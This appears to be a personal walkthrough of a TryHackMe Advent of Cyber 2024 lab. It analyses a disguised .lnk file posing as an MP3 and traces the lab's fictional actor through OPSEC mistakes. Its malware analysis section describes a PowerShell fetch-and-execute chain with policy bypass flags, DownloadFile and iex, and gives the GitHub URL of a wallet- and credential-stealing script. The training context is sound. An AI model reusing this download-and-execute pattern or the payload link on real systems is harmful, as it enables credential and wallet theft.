Tryhackme advent of cyber 2024 | opsec day 1 | task 7

OPSEC | OPERATIONAL SECURITY

About Task:-

  • Learn how to investigate malicious link files.

  • Learn about OPSEC and OPSEC mistakes.

  • Understand how to track and attribute digital identities in cyber investigations

IP – 10.10.225.49 The Machine is up and Alive Responding to Pings.

  1. NMAP SCAN Discovered open port 80/tcp on 10.10.225.49 Discovered open port 22/tcp on 10.10.225.49 Discovered open port 8000/tcp on 10.10.225.49

port 80 makes us shift our focus on potential website/webpage endpoints.

INVESTIGATING THE WEBSITE

At First Glance We get to know that this is a Youtube (YT) to MP3, MP4 Converter Website

Upon Pasting https://www.youtube.com/watch?v=dQw4w9WgXcQ into the field and downloading MP3 format file we get a .zip file , after Extracting the file , we get two .mp3 files names “song.mp3” and “somg.mp3”

upon running “file song.mp3” and “file somg.mp3” in terminal we see the follow output :-

we notice that the first “song.mp3” seems normal mp3 file, But the second “somg.mp3” file has some strange shortcut linked to it,

The output tells us that instead of an MP3, the file is an “MS Windows shortcut”, also known as a .lnk file. This file type is used in Windows to link to another file, folder, or application. These shortcuts can also be used to run commands! If you’ve ever seen the shortcuts on a Windows desktop, you already know what they are.

There are multiple ways to inspect .lnk files to reveal the embedded commands and attributes. For this room, however, we’ll use ExifTool, which is already installed on this machine.

To do this, go back to your Terminal and type:

exiftool somg.mp3

the Output of the Above command is :

We can clearly see that it executes a remote powershell script hosted on github server Let’s now Breakdown every step in this and understand what does this script does !

  • The -ep Bypass -nop flags disables Powershell’s usual restrictions, allowing scripts to run without interference from security settings or userprofiles

  • The DownloadFile method pulls a file (in this case, IS.ps1) from a remote server (https://raw.githubusercontent.com/MM-WarevilleTHM/IS/refs/heads/main/IS.ps1) and saves it in the C:\\ProgramData\\ directory on the target machine.

  • Once downloaded, the script is executed with PowerShell using the iex command, which triggers the downloaded s.ps1 file.

  • If you visit the contents of the file to be downloaded using your browser (https://raw.githubusercontent.com/MM-WarevilleTHM/IS/refs/heads/main/IS.ps1), you will see just how lucky we are that we are not currently using Windows.

https://raw.githubusercontent.com/MM-WarevilleTHM/IS/refs/heads/main/IS.ps1

As we Can see that this Script steals Victim’s wallet information of various Crypto Currencies like ethereum , monero, .dogecoin, bitcoin, etc

The script is designed to collect highly sensitive information from the victim’s system, such as cryptocurrency wallets and saved browser credentials, and send it to an attacker’s remote server.

This looks fairly typical of a PowerShell script for such a purpose, with one notable exception: a signature in the code that reads.

“Created by the one and only M.M.”

Search for this on github.com or by going directly to this link:

https://github.com/search?q=%22Created+by+the+one+and+only+M.M.%22&type=issues

If you look through the search results, you can be able infer the malicious actor’s identity based on information on the project’s page and the GitHub Issues section.

This User Made a Comment on the issues section of the repository due to this we are able to infer the malicious actor’s identity by visiting his profile page on:

https://github.com/MM-WarevilleTHM/M.M

By seeing his Readme.md file we can clearly see the Malicious Actor’s Real Identity Name that is “Mayor Malware

CONCLUSION:-

  • What do we Learn from this ? This is a classic case of OPSEC failure. Operational Security (OPSEC) is a term originally coined in the military to refer to the process of protecting sensitive information and operations from adversaries. The goal is to identify and eliminate potential vulnerabilities before the attacker can learn their identity.

In the context of cyber security, when malicious actors fail to follow proper OPSEC practices, they might leave digital traces that can be pieced together to reveal their identity. Some common OPSEC mistakes include:

  • Reusing usernames, email addresses, or account handles across multiple platforms. One might assume that anyone trying to cover their tracks would remove such obvious and incriminating information, but sometimes, it’s due to vanity or simply forgetfulness.

  • Using identifiable metadata in code, documents, or images, which may reveal personal information like device names, GPS coordinates, or timestamps.

  • Posting publicly on forums or GitHub (Like in this current scenario) with details that tie back to their real identity or reveal their location or habits.

  • Failing to use a VPN or proxy while conducting malicious activities allows law enforcement to track their real IP address.

You’d think that someone doing something bad would make OPSEC their top priority, but they’re only human and can make mistakes, too.

FOR EXAMPLE

Here are some real-world OPSEC mistakes that led to some really big fails:

1. AlphaBay Admin Takedown

One of the most spectacular OPSEC failures involved Alexandre Cazes, the administrator of AlphaBay, one of the largest dark web marketplaces:

  • Cazes used the email address “[pimp_alex_91@hotmail.com] ” in early welcome emails from the site.

  • This email included his year of birth and other identifying information.

  • He cashed out using a Bitcoin account tied to his real name.

  • Cazes reused the username “Alpha02” across multiple platforms, linking his dark web identity to forum posts under his real name.

2. Chinese Military Hacking Group (APT1)

There’s also the notorious Chinese hacking group APT1, which made several OPSEC blunders:

  • One member, Wang Dong, signed his malware code with the nickname “Ugly Gorilla”.

  • This nickname was linked to programming forum posts associated with his real name.

  • The group used predictable naming conventions for users, code, and passwords.

  • Their activity consistently aligned with Beijing business hours, making their location obvious.

These failures provided enough information for cyber security researchers and law enforcement to publicly identify group members.

Uncovering MM (Mayor Malware)

If you’ve thoroughly investigated the GitHub search result, you should have uncovered several clues based on poor OPSEC practices by the malicious actor.

We know the attacker left a distinctive signature in the PowerShell code (MM). This allowed us to search for related repositories and issues pages on GitHub. We then discovered an Issues page where the attacker engaged in discussions, providing more context and linking their activity to other projects.

In this discussion, they responded to a query about modifying the code. This response, paired with their unique handle, was another critical slip-up, leaving behind a trail of evidence that can be traced back to them. By analysing the timestamps, usernames, and the nature of their interactions, we can now attribute the mastermind behind the attack to MM.

PreviousTryHackMeNextMastering Linux Shells : A TryHackMe Walkthrough

Last updated